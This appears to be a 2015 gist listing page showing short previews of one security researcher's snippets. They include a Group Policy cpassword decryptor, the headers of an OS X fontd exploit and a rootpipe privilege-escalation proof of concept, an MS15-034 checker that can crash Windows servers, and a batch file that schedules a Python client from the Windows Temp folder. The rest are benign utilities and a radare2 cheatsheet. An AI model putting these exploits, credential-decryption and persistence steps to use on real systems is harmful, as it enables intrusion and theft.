Dan Borges ahhh
ahhh / Gpprefdecrypt.py
Created May 13, 2015 16:00
This tool decrypts the cpassword attribute value embedded in the Groups.xml file stored in the domain controller's Sysvol share.
#!/usr/bin/python
import sys
from Crypto.Cipher import AES
from base64 import b64decode
if(len(sys.argv) != 2):
    print "Usage: gpprefdecrypt.py <cpassword>"
    sys.exit(0)
ahhh / pass_gen.php
Created May 12, 2015 17:11
generator function to create new mysql hashes for specific applications
<?php
$str = "newpass";
echo sha1($str);
echo "\r\n"
?>
ahhh / epoctime.py
Created May 11, 2015 21:18
Convert from epoch time to GMT time
from time import gmtime, strftime
TIMESTAMP = 1413135372291 #EXAMPLE Replace w/ your values
# print gmtime(TIMESTAMP/1000)
print strftime('%m/%d/%Y %H:%M:%S', gmtime(TIMESTAMP/1000))
ahhh / paste_solve.py
Created May 3, 2015 17:25
VolgaCTF 2015 Quals Interstellar
offset = "01111101001000101000000111101001001011111110010011100111010011000010101101110110100001101011100101001110000000001101000110001011011010101001000000010010001100011001100011001011010101111011110110001100101100101000110011101111101101000110110010101001100100110100010101101111101111011001100011111101"
string = "From a seed a mighty trunk may grow.\n"
#string_entered = "01000110011100100110111101101101001000000110000100100000011100110110010101100101011001000010000001100001001000000110110101101001011001110110100001110100011110010010000001110100011100100111010101101110011010110010000001101101011000010111100100100000011001110111001001101111011101110010111000001010"
tmp = len(offset)
result = [None] * tmp
'''finalString = []
ahhh / ca.py
Last active August 29, 2015 14:20 — forked from vitapluvia/ca.py
#!/usr/bin/env python
import random
import sys
import time
import Image
#ROW_AMT = 11185
ROW_AMT = 285
COL_AMT = 290
ahhh / 0day.c
Created April 30, 2015 19:23
OS X 0-day April30 2015
OS X 0day - works on latest verz
BO exploitation @ fontd, allows payload to run code with fontd privileges.
#include <stdio.h>
#include <stdlib.h>
#include <mach/mach.h>
#include <servers/bootstrap.h>
#define SERVICE_NAME "com.apple.FontObjectsServer"
ahhh / CVE-2015-1635.py
Created April 15, 2015 18:16
Used to check for CVE-2015-1635 / MS15-034 which can lead to remote code execution. Currently when sending a request it can trigger a blue screen on the Windows Server, effectively rendering it offline.
'''
___. .___ __ __
\_ |__ ____ ___.__. ____ ____ __| _// |________ __ __ _______/ |_
| __ \_/ __ < | |/ _ \ / \ / __ |\ __\_ __ \ | \/ ___/\ __\
| \_\ \ ___/\___ ( <_> ) | \/ /_/ | | | | | \/ | /\___ \ | |
|___ /\___ > ____|\____/|___| /\____ | |__| |__| |____//____ > |__|
\/ \/\/ \/ \/ \/
MS15-034 Checker
Danger! This script has not been properly qa'd and will probably fail in terrible ways.
ahhh / r2_cheatsheet
Created April 11, 2015 02:07
radare2 cheatsheet
Radare2 CheatSheet:
===================
?             General Help for All Commands
pd [N]        Print Disassembly of N Opcodes
pa jmp 0x01   Assemble Opcodes
pcp           Dump Python Byte Code / C Byte Code with [pc]
iz            List Strings
is            List Symbols
iI            List Binary Info
s [addr]      Seek to Address
ahhh / CVE-2015-1130.py
Last active August 29, 2015 14:18
Exploit code for privilege escalation on OS X 10.7.*, 10.8.*, 10.9.* and 10.10.2
########################################################
#
# PoC exploit code for rootpipe (CVE-2015-1130)
#
# Created by Emil Kvarnhammar, TrueSec
# https://truesecdev.wordpress.com/2015/04/09/hidden-backdoor-api-to-root-privileges-in-apple-os-x/
#
# Tested on OS X 10.7.5, 10.8.2, 10.9.5 and 10.10.2
#
########################################################
ahhh / at.bat
Created April 6, 2015 16:29
Windows scheduled task to run at a specific time
sc config schedule start= auto
net start schedule
at 10:20 ""C:\Python32\python.exe C:\Windows\Temp\client.py""